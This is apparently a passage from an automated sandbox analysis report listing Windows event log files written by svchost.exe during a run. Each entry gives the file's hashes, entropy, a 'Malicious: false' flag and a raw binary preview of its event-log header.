Preview:	ElfChnk.........'...............'...........P.......H:Z.....................................................................gO.................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................f..................................**..............m.................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.8519554794255333
Encrypted:	false
SSDEEP:	384:WhtbpwV1pIvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWBZ:WwDoh1VqKVvcVU
MD5:	4140628CA3CEC29C0B506CEEBDF684F6
SHA1:	A2B70496C8E91D8E78AA04976B25D850ABAC6E1C
SHA-256:	1823149759A2F1771ACE7B6BE14A0FEFC6F93DD9F81AC1024E6B41C2CCBFD8B0
SHA-512:	779A04771A8E9B2F501FE1251F0D56C5B5988911F6067082D84FF1DBCF5D9281E32DF6CC2C995843EA1FCED748548DC116706E0F738B6510B47C2B3A0EBAA126
Malicious:	false
Preview:	ElfChnk.\...............\.......................0..../........................................................................v.......................................R...=...........................................................................................................................f...............?...........................m...................M...F............................................;..............&...................................i...................................mS..............*..8...\........=..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1642919553794224
Encrypted:	false
SSDEEP:	384:bhwCCRzCaCkClCzCYC/CyCVCGCMCvCNCACCxC/CLCoiC:bKFb
MD5:	D7EECF043241FDB9486580582E208603
SHA1:	045D5672A8E9884B78CD31C52D372375503CBF4F
SHA-256:	6F3BE76FC00FE21C18A904058F2AF850204488187187C9B8C4BF11EAA03EC6C0
SHA-512:	6738CD1D4081AD78CCC1E3E7AC46A394D9AC32906B4688E34DCCBBA42153FB826484C854F42FFF619DC8D50CAE708585B422F3EAA3A0219AAD19DC0962910125
Malicious:	false
Preview:	ElfChnk.....................................02..h6...u'.....................................................................1..................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................V2............................../...**..p............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Store%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.573786046413002
Encrypted:	false
SSDEEP:	768:CZZi8Ns5iLV8gRai8ZijiTEOmGkoeiDpbU:k+Jao7mce8pI
MD5:	89D19507EA663705D7EDB58E32A7D461
SHA1:	93FCCA29F726AFD237BAB88C976111C80E008F41
SHA-256:	11BE68A22947AF71FA0AD49B1AE422E7F40A4A4747748B97347F9ECBCAD2FA13
SHA-512:	01AB8E1179FD236DFC2601B816F8A4F598D30458325B52577644F543AF74E6F34498D84595A7895143094813DA74655D9333AD50ECB030461E2F306D11A17A18
Malicious:	false
Preview:	ElfChnk.....................................0#..8&..L.}................................................................................................................4...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..0...........c.$...............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storsvc%4Diagnostic.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1786915949858352
Encrypted:	false
SSDEEP:	384:DhL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUmNUmtUmxUmB9Um:DY7LI
MD5:	FCDF81898F226D346F04D4A9D66742C3
SHA1:	F50E0EF5EA062060A4DFE0CA2DD276521BD5092E
SHA-256:	B6DC9DD74B8CBFAC018FF447A1D31F17628789C0FB77FE2842A43F6033312ED1
SHA-512:	52FAD3642AD39B2C68FEEA6A88D26DC50325FAF92291D05AF72E457D1C23C27530B5BA98412344E5A3875C10C8F6CCC14F83E72E40989BBA8BAF859EEB2ECD59
Malicious:	false
Preview:	ElfChnk....................................../..(4.... >....................................................................................... .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................&..................................................................................../..................................*..............a...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-TZUtil%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.20420972245704283
Encrypted:	false
SSDEEP:	48:MaW41rP+MZQNRBEZWTENO4bpBko4yi/6FgVt:b/KNVaO80oXi/6Fg
MD5:	E294A7436BC6D4E3558F4974A68FCDB0
SHA1:	A620090175327F94546A2B947029569DBAFB3DC5
SHA-256:	2A03CE3CE5E3343D8D86FF86AC124047B2E87B96F8B91E1247AFA6A639A2AB79
SHA-512:	A471B903AA9329717C3AEC14A1C41C0FD1B9B0B1CF7E0EE7560A9DC97AFA60AE2B5C1416691121CDA71476B90FBEC8EF738C9960007221AFB07CAFF3AADD93CC
Malicious:	false
Preview:	ElfChnk................................................S......................................................................'................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**................................&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.6469884746870727
Encrypted:	false
SSDEEP:	384:/hpivNiGiriPiYiriDfiS83i0iGiTiYiUisiuiZi+iTiciUiQiJiUiBi4i/iAixQ:/G7t8H
MD5:	FC81D9FBA555C6BC7223594B8F6B46DE
SHA1:	971F47CFC0E1DCA462928DA2D8BE2B16D5A0629C
SHA-256:	9933922E09C49C5BA80292C4AED9EC9F457031E90B28B421DFFBD2F1BB840671
SHA-512:	7F2705E7526B49F76C5F2A76A88B83FC10591BAD68B451F5C67F841322076D4B408FC515EA59E0919907C73CBBD149AB5B5EE981083A52C9E90EC9FBFAD5254F
Malicious:	false
Preview:	ElfChnk.y...............y................... Q..(S...b.......................................................................t..............................................=.......................#...................................................................................................f...............?.......................P.......................M...F...............................................................................................................VG..................................**......y..........:............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.4074236171082695
Encrypted:	false
SSDEEP:	768:aTa0N7aPananajavanara3afaDaPaHaDa7aHa7araDa/azaTara3aHabajafaHav:8N
MD5:	896FEF5679C89EE51AB514435EC723B5
SHA1:	F5D99AF1D523B53967B2A43A7EBF6C0F34B3B5AA
SHA-256:	571373BA229A77DC4AF4CC66EF69F17D2E362DA66480BF5D56F297D68528EA77
SHA-512:	3970041CC336BB3808D5193617C625A53AD6BEFD65CFBDE7FF4B24BAF6A7F5978AB377E931FAE2B9E376874B5E9A716349815047F2F941257827AD518362B860
Malicious:	false
Preview:	ElfChnk.........@...............@...............`...o.{......................................................................h..................`...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................9...................................**..H.............A...............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Device Registration%4Admin.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.3132453844344478
Encrypted:	false
SSDEEP:	384:hhaXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJnXJRXJtXJLXJjXJppXJ:hQ0yUkNYwD8imLE5nTtFpf
MD5:	6237EE0458A0478242B975E9BB7AA97D
SHA1:	6B0BDBA887DA21675A63FC73AED995B1BCA3F6B1
SHA-256:	C8E224C54278C206302EAD7011ACC48CAC60E7638E32EE70653190DBC90FA70A
SHA-512:	56C025C971F77AB8E911E0190E8AB5CF533A909C1BF4558876FB2761AAA381CB7D21E44A3273FA4427CB2FF7DEECC15A312DD2A424B96ABDC4886BDF233F30E9
Malicious:	false
Preview:	ElfChnk......................................<...A.........................................................................i,.q................j...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................<......C...........................**..............@V.$..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Profile Service%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.325262033408211
Encrypted:	false
SSDEEP:	384:6hYmn9moomUmKBmZOmZmlmmmomRmemtmsmimGmHmEmqmwmHmLmlm9mGmdmpm3mfO:6/fGTDcx
MD5:	D13189B45679E53F5744A4D449F8B00F
SHA1:	ED410CAB42772E329F656B4793B46AC7159CF05B
SHA-256:	BAA80D6A7DC42752766B1862A00009A1D76B57022A4D5A89692DBA2D6866EBA1
SHA-512:	83399CE082F8C6D2917B8363E053C770F2783B3D086F39736919FBFA533DF65993A3B7840A2E1000B08948584CF9750C27961BF8A7BE3A235B5DDD779616013F
Malicious:	false
Preview:	ElfChnk.....................................h.................................................................................-.................X...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................1...........&.......................................................................................**..x...........~_g...............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7947046118743749
Encrypted:	false
SSDEEP:	384:jhr2zS2o202AW2D2t2l292l2V2p2d2N2:j8Q
MD5:	55E73A924B170FBFFF862E8E195E839A
SHA1:	3C625D05DFC08AE9DF26AEBAA82D72FC9F28ADB0
SHA-256:	1B36D85AA56A023F6646D6EF28C9DCB5358528274EDCC9B6ED20705E3007E8A2
SHA-512:	E14D32569F37A827EDBD1F02667866431C856D087A396933DE5E9B87943369C4802D220557050C7B0FE9367FBD0683676776E6D3CCBCB290C9F30D86EC529E28
Malicious:	false
Preview:	ElfChnk...................................... ..X"...........................................................................?.................Z...........................=...........................................................................................................................f...............?...........................m...................M...F...............................3...........................&.......................................................................................**................................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-WER-PayloadHealth%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 9, DIRTY
Category:	dropped
Size (bytes):	84544
Entropy (8bit):	2.0937517667811107
Encrypted:	false
SSDEEP:	1536:bMpP9JcY6+g4+Ga6cMpP9JcY6+g4+Ga6VMpP9JcY6+g4+Ga6y:bMpP9JcY6+g4+Ga6cMpP9JcY6+g4+Gas
MD5:	DF7D9B8E431AE0086976C6C8D61A4AA1
SHA1:	CDCEBD1FA1A106F8A6D432F835EEB22FCF4CE495
SHA-256:	5AA4E6BD41034CE32058888DA0E32058F19C20111C528CAE1CCE2B3732A245C7
SHA-512:	1DC4C1F2B8B0443994EAE5356B7AB729F42DF8CF355CC45DBEF8E9989A2969D70A3C57B85D4272F1564976BEE6CE8C5C0602F3A0FC7864238E818197A733FD29
Malicious:	false
Preview:	ElfFile.........................................................................................................................ElfChnk.....................................p ..."....e.....................................................................!.xp................Z...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...................................................^...3...............................**................................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

C:\Windows\System32\winevt\Logs\Microsoft-Windows-WMI-Activity%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	66560
Entropy (8bit):	4.360289705952508
Encrypted:	false
SSDEEP:	384:tkRAxhSRumRtRqR5RVR+rRvR3RFRXRmRbR+RLRlRFRDRiwhR3KR31RIRB8R+PRdL:tbxA8nPLGbD
MD5:	C34CB431D02537390E70F4D7209592D1
SHA1:	D722DDF3A40498D3F8D04E36CE7890DC66154361
SHA-256:	A4B23D8EB6B5E77F4D092ACF45377ACE91CB01CB9B9927DCA59FB2686A86F2F4
SHA-512:	17009505FC8FC71FEB61D25F5D1037952FB9AAE78A26D3829E796F4CB7B18B2588593BCB32C5886723577587714C3B9E123688069A74024E3358904EC06B69CF
Malicious:	false
Preview:	ElfChnk................................................7......................................................................d......................y.......x..N...........=............................................y..................}y..3...........................................c......xb..f...h.......lc..?.......................h........c......M.......M...F...9c..............................................Qb..............................................A.......i.......................&............x..**...............%.............x68................................................................<.......T.....!................@.%......mz.B...N...r..V.`...p........................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y.......#F.~.J.{..M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y./.O.p.e.r.a.t.i.o.n.a.l......Qb......................N...W.M.I.P.r.o.v.......w.m.i.p.r.v.s.e...e.x.e...`...%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.b.e.m.\.w.m.i.p

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Wcmsvc%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.273338343434408
Encrypted:	false
SSDEEP:	384:mhWhjhUh4h4hthXhzh8cghshqh9hihXhMhxhzhwhohGh5h3hShChWhzhLhahYhC1:mBsFpkBjOFK
MD5:	C37372EB51AEDB4552CB839C7294403A
SHA1:	7B7C408D72B084CE36AA6B623AC6B907FD21D569
SHA-256:	C3B5D9D16F88507EF69A9B6FF8581AEBAFF84D254F62CD4E75B6A9C6F93E93C4
SHA-512:	69183719C29FCE5CEDB2634579ABA9FEF835A3CDC7668BB741F9DB36050756C088FD331E898DA8E4850887FD217B939DF1C5A3E7D73D2260CB3AC3570E71718E
Malicious:	false
Preview:	ElfChnk....................................................................................................................x...........................................8...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..............i.T..............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-WebAuthN%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.231195890775603
Encrypted:	false
SSDEEP:	384:ZhOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOVt9VjViVyVKVui:Zyjbn
MD5:	3365A34953FD7B16667108A049B64DA5
SHA1:	C72421A58E063D64072152344B266F8306A78702
SHA-256:	AAEDFFE84B66B602858AF51D5B2EBA7CFC9DB57A4A3DD3240DB44B737B9BBF26
SHA-512:	A5569EDC7516DACCCE7B3135114588E01ED1A77CA95B0F378E389E27AC8999EA71E8AF36FD275EEA7E81987CB9BF14910645DE3DC4FE8E086FF532796DD78AAF
Malicious:	false
Preview:	ElfChnk.........!...............!............7..`8...j......................................................................@..#................&...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................v....................................................3..................................**..P...........y................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.3511865883847
Encrypted:	false
SSDEEP:	384:Jh+BwB5BwBjBwBNSBwBYiBwB+BwBXBwBZabSqBwBlQBwBtfBwBvBwBPnBwBIrBwc:JOqabeGTnbuSxQ
MD5:	E72186284271FFF786A622B1D15C9A40
SHA1:	69277A92F7C1AF6D3299A771090115516C58E255
SHA-256:	5F9E1C66300EE1B0ACEF5373AA42B982F6386ABE7A1E819B561DBDAFF1E8019B
SHA-512:	CB9DC49EB8174516BD360CE0FBEFE05D2E8A3EE3D698E787FFE912160DDE7D9B6BF786196875789D5B5D96250235D444633AC480D850155C2959A934B4B2C738
Malicious:	false
Preview:	ElfChnk.....................................H...x...X..........................................................................@............................................=...........................................................................................................................f...............?...........................m...................M...F....................S......................................&...................................u...................................................**...............Dbf..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winlogon%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.421206160086997
Encrypted:	false
SSDEEP:	384:ah1qUEzUELUEnUEQUEpUE9UE4UEvUEqUEGUEuUEyUEpjUEmUE6UEVUE1UEdUEoUF:arN5mPfkvmR
MD5:	67CAD90771EBC0BD20736201D89C1586
SHA1:	EE241B07EBD6E7A64AE367520F5C0665F4EBBAD7
SHA-256:	7801ED56F87C5A71A42128D089176CFDAACCCD6998EACCD07E46207F2CD48467
SHA-512:	27DE77A98E11A1D33B648B9F46671F61338B1746032B4AD8F003A8A5C52FB7C3ECCB834057074EF5FCD3459A0810439BAF63E1320B385F7A5E81757A90BBFD13
Malicious:	false
Preview:	ElfChnk.........l...............l...............@....^.....................................................................+t].................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......Q8.......................................................6......................**...............yM..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Security.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	69752
Entropy (8bit):	4.430470792529309
Encrypted:	false
SSDEEP:	384:M1ooWRoI8o+3ooWtooWkooW+ooWofFRfB52M7tUoqRMtEoO1nkocUo+tyZfohmBU:xzJdADmtq
MD5:	49335D3DF21A46F17E2B05135D60CB1B
SHA1:	28BF78A2E48FF5F6406F90ACA46F8151A6334C80
SHA-256:	E0AC870B8EC3A165F9D2FA5744D4DA2396DDA4BE775F29B4E20CAE5EF4BD03A5
SHA-512:	1E0F0A76BBB831533587C2AE619F0E5224B62EB679A731D7E65102F5F7D23E6D1FA5159CD58EFD31D8FFA2D7412D9C819D5BA59951E5DE78552C7768FC043E99
Malicious:	false
Preview:	ElfChnk.........-.......U............................$N........................................................................................Z...s...h...................=...................................................N...............................................w.......4.......................-...................................[...........).......M...R...:....................$......C+..3...........................&...............................................>.......................s5..........**......{.........................>...............................................................F.............!....6.......... ..........]{.SH.g.P...[t.......{........M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.A.u.d.i.t.i.n.g.%..TxT.I..>;.(..S.e.c.u.r.i.t.y....w"B........................N...........................................$.N......j.o.n.e.s...J.O.N.E.S.-.P.C...}@......M.i.c.r.o.s.o.f.t.A.c.c.o.u.n.t.:.u.s.e.r.=.0.2.r.x.e.m.p.x.a.r.q.j.a.e.g.y...........%.%.8

C:\Windows\System32\winevt\Logs\System.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.419738232285116
Encrypted:	false
SSDEEP:	768:6N2xZFDVqYo6nLmLQXHmtpJnqiNHpzoQp:uMRz4MHmcs
MD5:	5231221188C34DA85A8C54CB787886E6
SHA1:	B5B7D7A5AA3497AE9C5C736A617478367775CC24
SHA-256:	D58CD0790E554BEBF1A235C89A8EE095B6CFFDBEC6742625EA7E12939531248B
SHA-512:	777F2978277EBFD9EEA88C863D1E09DCD2E60A5C393DDBFF7CCCEFB96B139C192E7C637C618EA9C1237382445A09CE5966845F1BB36CF73A4BA28FA4B9C62DC8
Malicious:	false
Preview:	ElfChnk.................m.......t...............h..../.......................................................................f................4...s...h...............\...=...................................................N...............................................w.......0.......................E...................................W...........).......M...3...:...........................................................................................................................&...................**......m.........Y............i.e&........i.e.t.Q...H.C.A;.......A../...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....X...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.

C:\Windows\System32\winevt\Logs\Windows PowerShell.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	322768
Entropy (8bit):	3.931182330987314
Encrypted:	false
SSDEEP:	6144:Oz3HkMz3Hiz3HmMz3HEz3HOz3HkMz3Hiz3HmMz3HEz3HxznazeRz3HkMz3Hiz3HC:
MD5:	B265346435737ABEE5A86F833B7D4B8C
SHA1:	C7E7A5FF2DE6E94CA9B6B8918BD582DF28D1DD49
SHA-256:	5E9FE5991734BE0E21C09FA685454E6A4F9F66E09DF3FE85AC5FAF438AC82738
SHA-512:	741602539D8918DEC25967165E491C76C0465A02507A83F8DA477E48ADE4A12E88E99E0967AAA90D8001BF038A10905CE4BBE49362A01DD6BDA72E7148C61709
Malicious:	false
